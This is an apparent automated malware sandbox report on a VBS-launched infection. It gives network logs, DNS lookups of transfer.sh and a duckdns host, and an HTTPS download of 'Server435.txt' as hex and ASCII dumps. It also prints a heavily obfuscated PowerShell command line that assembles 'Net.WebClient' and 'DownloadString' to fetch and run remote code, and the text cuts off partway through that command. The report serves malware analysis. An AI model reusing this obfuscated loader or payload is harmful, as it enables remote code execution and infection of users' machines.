                                                                    Mar 8, 2022 20:26:26.440638065 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.440701008 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.440740108 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.440808058 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.440823078 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.440880060 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.440934896 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464034081 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464081049 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464282036 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464299917 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464363098 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464611053 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464644909 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464698076 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464708090 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464752913 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464766026 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464771986 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464785099 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464827061 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464865923 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.464869976 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.464915991 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.488903046 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.488944054 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.489068031 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.489085913 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.489100933 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.489145041 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490024090 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490058899 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490185022 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490196943 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490242958 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490658045 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490689993 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490736961 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490745068 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490753889 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490789890 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490824938 CET44349771144.76.136.153192.168.2.5
                                                                    Mar 8, 2022 20:26:26.490825891 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.490880013 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:26:26.492634058 CET49771443192.168.2.5144.76.136.153
                                                                    Mar 8, 2022 20:27:13.232953072 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:13.369191885 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:13.369326115 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:15.986231089 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:16.179392099 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:16.182450056 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:16.378379107 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:44.456373930 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:44.513868093 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:44.650372028 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:44.826404095 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:44.904067039 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:45.093646049 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:27:45.093781948 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:27:45.281146049 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:28:23.277844906 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:28:23.473041058 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:28:23.473172903 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:28:23.660459042 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:28:44.465008974 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:28:44.518913984 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:28:44.655447006 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:28:44.658276081 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:28:45.003312111 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:28:45.196784973 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:30.572236061 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:29:30.768949032 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:30.769073009 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:29:30.955574036 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:44.476141930 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:44.523931980 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:29:44.660274982 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:44.707282066 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:29:44.895181894 CET88914977937.120.141.190192.168.2.5
                                                                    Mar 8, 2022 20:29:44.899162054 CET497798891192.168.2.537.120.141.190
                                                                    Mar 8, 2022 20:29:45.098283052 CET88914977937.120.141.190192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 8, 2022 20:26:08.052411079 CET5393453192.168.2.58.8.8.8
                                                                    Mar 8, 2022 20:26:25.420298100 CET6371253192.168.2.58.8.8.8
                                                                    Mar 8, 2022 20:26:25.441160917 CET53637128.8.8.8192.168.2.5
                                                                    Mar 8, 2022 20:27:13.095765114 CET6096953192.168.2.58.8.8.8
                                                                    Mar 8, 2022 20:27:13.202739954 CET53609698.8.8.8192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Mar 8, 2022 20:26:08.052411079 CET192.168.2.58.8.8.80xd9b5Standard query (0)store-images.s-microsoft.comA (IP address)IN (0x0001)
                                                                    Mar 8, 2022 20:26:25.420298100 CET192.168.2.58.8.8.80x8505Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                    Mar 8, 2022 20:27:13.095765114 CET192.168.2.58.8.8.80xd4bStandard query (0)nyanwmoney.duckdns.orgA (IP address)IN (0x0001)
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Mar 8, 2022 20:26:08.072171926 CET8.8.8.8192.168.2.50xd9b5No error (0)store-images.s-microsoft.comstore-images.s-microsoft.com-c.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                    Mar 8, 2022 20:26:25.441160917 CET8.8.8.8192.168.2.50x8505No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                    Mar 8, 2022 20:27:13.202739954 CET8.8.8.8192.168.2.50xd4bNo error (0)nyanwmoney.duckdns.org37.120.141.190A (IP address)IN (0x0001)
                                                                    • transfer.sh
                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549771144.76.136.153443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-03-08 19:26:25 UTC0OUTGET /get/8J0O0I/Server435.txt HTTP/1.1
                                                                    Host: transfer.sh
                                                                    Connection: Keep-Alive
                                                                    2022-03-08 19:26:26 UTC0INHTTP/1.1 200 OK
                                                                    Server: nginx/1.14.2
                                                                    Date: Tue, 08 Mar 2022 19:26:26 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 135813
                                                                    Connection: close
                                                                    Content-Disposition: attachment; filename="Server435.txt"
                                                                    Retry-After: Tue, 08 Mar 2022 20:26:26 GMT
                                                                    X-Made-With: <3 by DutchCoders
                                                                    X-Ratelimit-Key: 127.0.0.1,84.17.52.7,84.17.52.7
                                                                    X-Ratelimit-Limit: 10
                                                                    X-Ratelimit-Rate: 600
                                                                    X-Ratelimit-Remaining: 9
                                                                    X-Ratelimit-Reset: 1646767586
                                                                    X-Remaining-Days: n/a
                                                                    X-Remaining-Downloads: n/a
                                                                    X-Served-By: Proudly served by DutchCoders
                                                                    Strict-Transport-Security: max-age=63072000
                                                                    2022-03-08 19:26:26 UTC0INData Raw: 24 4f 75 74 50 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 49 43 50 44 52 43 59 4e 53 51 43 44 56 4b 42 49 57 49 46 5a 43 44 22 0d 0a 66 75 6e 63 74 69 6f 6e 20 4b 56 44 4b 47 59 42 41 58 41 4b 51 58 56 59 57 49 58 51 4a 44 45 28 24 4c 48 4e 59 56 44 58 49 4c 54 4b 4e 58 46 5a 4b 4b 4f 4f 44 51 54 29 20 7b 0d 0a 20 20 20 20 24 50 52 45 53 46 47 45 51 54 46 52 57 45 45 48 42 46 58 51 58 4a 55 20 3d 20 22 22 0d 0a 20 20 20 20 66 6f 72 20 28 24 4c 4f 54 43 4b 47 55 4e 52 42 44 4f 4b 45 4b 50 4f 49 56 48 49 49 20 3d 20 30 3b 20 24 4c 4f 54 43 4b 47 55 4e 52 42 44 4f 4b 45 4b 50 4f 49 56 48 49 49 20 2d 6c 74 20 24 4c 48 4e 59 56 44 58 49 4c 54 4b 4e 58 46 5a 4b 4b 4f 4f 44 51 54 2e 4c 65 6e 67 74 68 3b 20 24 4c 4f 54 43 4b 47 55 4e 52 42
                                                                    Data Ascii: $OutPath = "C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD"function KVDKGYBAXAKQXVYWIXQJDE($LHNYVDXILTKNXFZKKOODQT) { $PRESFGEQTFRWEEHBFXQXJU = "" for ($LOTCKGUNRBDOKEKPOIVHII = 0; $LOTCKGUNRBDOKEKPOIVHII -lt $LHNYVDXILTKNXFZKKOODQT.Length; $LOTCKGUNRB
                                                                    2022-03-08 19:26:26 UTC16INData Raw: 27 27 27 27 27 38 36 31 38 27 46 27 41 38 32 27 27 31 36 27 27 31 34 33 33 27 27 27 27 27 27 27 27 39 31 31 38 31 35 27 41 32 45 27 27 31 36 27 27 27 27 27 27 27 31 27 27 38 31 27 44 27 27 27 27 27 31 27 27 44 31 27 36 27 27 27 27 27 31 27 27 34 37 27 31 27 27 27 27 27 31 27 27 32 42 27 32 27 27 27 27 27 31 27 27 32 41 27 44 27 27 27 27 27 31 27 27 46 42 27 35 27 27 27 27 27 31 27 27 45 33 27 37 27 27 27 27 27 32 27 27 45 32 27 43 27 27 32 27 27 27 27 27 45 31 27 27 27 27 27 27 27 31 27 27 36 27 27 31 27 27 27 27 27 31 27 27 34 41 27 27 27 27 27 27 27 32 27 27 35 33 27 32 27 27 27 27 27 31 27 27 33 44 27 32 27 27 27 27 27 31 27 27 32 33 27 31 27 27 27 27 27 31 27 27 31 44 27 33 27 27 27 27 27 32 27 27 42 34 27 41 27 27 27 27 27 33 27 27 42 44 27 44 27 27
                                                                    Data Ascii: '''''8618'F'A82''16''1433''''''''911815'A2E''16'''''''1''81'D'''''1''D1'6'''''1''47'1'''''1''2B'2'''''1''2A'D'''''1''FB'5'''''1''E3'7'''''2''E2'C''2'''''E1'''''''1''6''1'''''1''4A'''''''2''53'2'''''1''3D'2'''''1''23'1'''''1''1D'3'''''2''B4'A'''''3''BD'D''
                                                                    2022-03-08 19:26:26 UTC32INData Raw: 27 34 45 27 27 32 44 27 27 35 37 27 27 33 27 27 27 37 32 27 27 36 44 27 27 33 38 27 27 33 38 27 27 33 39 27 27 33 31 27 27 32 45 27 27 36 35 27 27 37 38 27 27 36 35 27 27 27 27 27 27 27 27 27 27 33 34 27 27 27 38 27 27 27 31 27 27 35 27 27 27 37 32 27 27 36 46 27 27 36 34 27 27 37 35 27 27 36 33 27 27 37 34 27 27 35 36 27 27 36 35 27 27 37 32 27 27 37 33 27 27 36 39 27 27 36 46 27 27 36 45 27 27 27 27 27 27 33 27 27 27 32 45 27 27 33 27 27 27 32 45 27 27 33 27 27 27 32 45 27 27 33 27 27 27 27 27 27 27 33 38 27 27 27 38 27 27 27 31 27 27 34 31 27 27 37 33 27 27 37 33 27 27 36 35 27 27 36 44 27 27 36 32 27 27 36 43 27 27 37 39 27 27 32 27 27 27 35 36 27 27 36 35 27 27 37 32 27 27 37 33 27 27 36 39 27 27 36 46 27 27 36 45 27 27 27 27 27 27 33 27 27 27 32 45
                                                                    Data Ascii: '4E''2D''57''3'''72''6D''38''38''39''31''2E''65''78''65''''''''''34'''8'''1''5'''72''6F''64''75''63''74''56''65''72''73''69''6F''6E''''''3'''2E''3'''2E''3'''2E''3'''''''38'''8'''1''41''73''73''65''6D''62''6C''79''2'''56''65''72''73''69''6F''6E''''''3'''2E
                                                                    2022-03-08 19:26:26 UTC48INData Raw: 27 27 27 34 37 45 32 33 27 27 27 27 27 34 32 38 32 41 27 27 27 27 27 41 32 38 27 35 27 27 27 27 27 36 37 45 32 34 27 27 27 27 27 34 37 45 32 35 27 27 27 27 27 34 37 45 32 36 27 27 27 27 27 34 32 38 32 42 27 27 27 27 27 41 32 38 27 35 27 27 27 27 27 36 32 38 27 39 27 27 27 27 32 42 38 27 33 38 27 27 27 27 27 34 32 27 46 44 39 27 27 32 27 27 32 27 31 43 31 35 27 37 27 27 35 39 32 27 45 37 37 42 46 42 46 46 33 42 44 41 46 37 46 46 46 46 33 38 36 36 46 38 46 46 46 46 32 27 44 43 27 31 27 27 27 27 32 38 35 44 27 27 27 27 27 36 38 27 31 31 27 27 27 27 27 34 31 37 33 41 38 27 46 46 46 46 46 46 33 38 39 27 46 44 46 46 46 46 37 45 32 42 27 27 27 27 27 34 32 38 27 35 27 27 27 27 27 36 37 45 32 43 27 27 27 27 27 34 37 45 32 44 27 27 27 27 27 34 32 38 32 41 27 27 27
                                                                    Data Ascii: '''47E23'''''4282A'''''A28'5'''''67E24'''''47E25'''''47E26'''''4282B'''''A28'5'''''628'9''''2B8'38'''''42'FD9''2''2'1C15'7''592'E77BFBFF3BDAF7FFFF3866F8FFFF2'DC'1''''285D'''''68'11'''''4173A8'FFFFFF389'FDFFFF7E2B'''''428'5'''''67E2C'''''47E2D'''''4282A'''
                                                                    2022-03-08 19:26:26 UTC64INData Raw: 27 27 46 45 27 43 31 37 27 27 39 43 32 27 36 27 27 27 27 27 27 27 32 27 31 45 27 27 27 27 27 27 35 38 46 45 27 45 31 37 27 27 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 46 45 27 43 31 37 27 27 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 37 38 27 27 27 27 27 27 32 27 35 27 27 27 27 27 27 27 35 38 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 38 38 27 27 27 27 27 27 32 27 32 44 27 27 27 27 27 27 35 39 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 41 39 27 27 27 27 27 27 32 27 32 38 27 27 27 27 27 27 35 38 39 43 32 27 33 45 27 27 27 27 27 27 32 27 31 44 27 27 27 27 27 27 35 38 46 45 27 45 31 37 27 27 46 45 27 43 31 36 27 27 32 27 31 41 27 27 27 27 27 27 46 45 27 43 31 37 27 27 39 43 46
                                                                    Data Ascii: ''FE'C17''9C2'6'''''''2'1E''''''58FE'E17''FE'C16''2'19''''''FE'C17''9CFE'C16''2'19''''''2'78''''''2'5'''''''589CFE'C16''2'19''''''2'88''''''2'2D''''''599CFE'C16''2'19''''''2'A9''''''2'28''''''589C2'3E''''''2'1D''''''58FE'E17''FE'C16''2'1A''''''FE'C17''9CF
                                                                    2022-03-08 19:26:26 UTC80INData Raw: 27 42 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 32 27 27 32 27 27 27 27 27 27 32 27 27 36 27 27 27 27 27 27 35 38 39 43 32 27 46 42 27 27 27 27 27 27 32 27 35 33 27 27 27 27 27 27 35 39 46 45 27 45 27 34 27 27 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 32 27 42 34 27 27 27 27 27 27 32 27 34 46 27 27 27 27 27 27 35 39 39 43 32 27 36 32 27 27 27 27 27 27 32 27 34 41 27 27 27 27 27 27 35 38 46 45 27 45 27 34 27 27 46 45 27 43 27 27 27 27 32 27 27 44 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 44 27 27 27 27 27 27 32 27 44 34 27 27 27 27 27 27 32 27 34 36 27 27 27 27 27
                                                                    Data Ascii: 'B''''''FE'C'4''9CFE'C''''2''C''''''2''2''''''2''6''''''589C2'FB''''''2'53''''''59FE'E'4''FE'C''''2''C''''''FE'C'4''9CFE'C''''2''C''''''2'B4''''''2'4F''''''599C2'62''''''2'4A''''''58FE'E'4''FE'C''''2''D''''''FE'C'4''9CFE'C''''2''D''''''2'D4''''''2'46'''''
                                                                    2022-03-08 19:26:26 UTC96INData Raw: 27 31 27 27 27 27 37 27 27 32 27 27 27 27 34 35 27 27 33 44 27 27 32 39 27 27 27 33 27 31 27 27 27 27 38 33 27 32 27 27 27 27 34 35 27 27 33 44 27 27 32 45 27 27 27 33 27 31 27 27 27 27 39 36 27 32 27 27 27 27 34 35 27 27 33 44 27 27 33 33 27 27 27 33 27 31 27 27 27 27 41 39 27 32 27 27 27 27 34 35 27 27 33 44 27 27 33 38 27 27 27 42 27 31 31 27 27 27 42 43 27 32 27 27 27 27 34 39 27 27 33 44 27 27 33 44 27 27 27 42 27 31 31 27 27 27 44 39 27 32 27 27 27 27 34 39 27 27 34 31 27 27 33 44 27 27 27 27 27 31 27 27 27 27 45 43 27 32 27 27 27 27 34 31 27 27 34 41 27 27 33 44 27 27 31 33 27 31 27 27 27 27 27 42 27 33 27 27 27 27 34 39 27 27 34 42 27 27 33 45 27 27 27 27 27 27 27 27 27 27 32 38 27 33 27 27 27 27 34 31 27 27 34 42 27 27 33 45 27 27 27 27 27 27 27
                                                                    Data Ascii: '1''''7''2''''45''3D''29'''3'1''''83'2''''45''3D''2E'''3'1''''96'2''''45''3D''33'''3'1''''A9'2''''45''3D''38'''B'11'''BC'2''''49''3D''3D'''B'11'''D9'2''''49''41''3D'''''1''''EC'2''''41''4A''3D''13'1'''''B'3''''49''4B''3E''''''''''28'3''''41''4B''3E'''''''
                                                                    2022-03-08 19:26:26 UTC112INData Raw: 27 27 34 36 35 36 33 31 37 32 34 39 33 34 36 36 36 46 35 35 33 31 27 27 36 32 34 39 36 37 37 32 34 33 35 39 35 33 36 31 35 34 36 37 27 27 36 45 36 34 35 35 37 32 35 38 33 33 33 34 34 35 37 32 33 32 27 27 34 42 35 31 34 44 37 32 35 39 35 34 35 37 33 36 33 34 36 41 27 27 34 31 37 33 37 33 36 35 36 44 36 32 36 43 37 39 27 27 35 31 35 34 34 44 37 32 35 34 36 39 37 32 35 33 37 33 35 34 27 27 35 32 35 33 34 31 34 33 37 32 37 39 37 27 37 34 36 46 35 33 36 35 37 32 37 36 36 39 36 33 36 35 35 27 37 32 36 46 37 36 36 39 36 34 36 35 37 32 27 27 37 34 37 37 35 32 37 32 37 38 36 44 33 38 34 46 36 37 34 38 27 27 35 35 34 36 36 31 37 32 35 27 36 35 37 38 35 38 34 32 35 39 27 27 36 37 36 35 37 34 35 46 34 31 37 33 37 33 36 35 36 44 36 32 36 43 37 39 27 27 37 33 36 35 37
                                                                    Data Ascii: ''465631724934666F5531''62496772435953615467''6E645572583334457232''4B514D7259545736346A''417373656D626C79''51544D72546972537354''5253414372797'746F536572766963655'726F7669646572''74775272786D384F6748''554661725'6578584259''6765745F417373656D626C79''73657
                                                                    2022-03-08 19:26:26 UTC128INData Raw: 27 27 37 34 27 27 37 32 27 27 36 39 27 27 36 45 27 27 36 37 27 27 34 36 27 27 36 39 27 27 36 43 27 27 36 35 27 27 34 39 27 27 36 45 27 27 36 36 27 27 36 46 27 27 27 27 27 27 32 34 27 32 27 27 27 27 27 31 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 34 27 27 36 32 27 27 33 27 27 27 27 27 27 27 33 43 27 27 27 45 27 27 27 31 27 27 34 33 27 27 36 46 27 27 36 44 27 27 37 27 27 27 36 31 27 27 36 45 27 27 37 39 27 27 34 45 27 27 36 31 27 27 36 44 27 27 36 35 27 27 27 27 27 27 27 27 27 27 34 33 27 27 36 43 27 27 36 31 27 27 37 33 27 27 37 33 27 27 34 43 27 27 36 39 27 27 36 32 27 27 37 32 27 27 36 31 27 27 37 32 27 27 37 39 27 27 33 31 27 27 27 27 27 27 34 34 27 27 27 45 27 27 27 31 27 27 34 36 27 27 36 39 27 27 36 43 27 27 36 35 27 27 34
                                                                    Data Ascii: ''74''72''69''6E''67''46''69''6C''65''49''6E''66''6F''''''24'2'''''1''3'''3'''3'''3'''3'''34''62''3'''''''3C'''E'''1''43''6F''6D''7'''61''6E''79''4E''61''6D''65''''''''''43''6C''61''73''73''4C''69''62''72''61''72''79''31''''''44'''E'''1''46''69''6C''65''4


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:20:26:13
                                                                    Start date:08/03/2022
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"
                                                                    Imagebase:0x7ff744810000
                                                                    File size:163840 bytes
                                                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:20:26:15
                                                                    Start date:08/03/2022
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3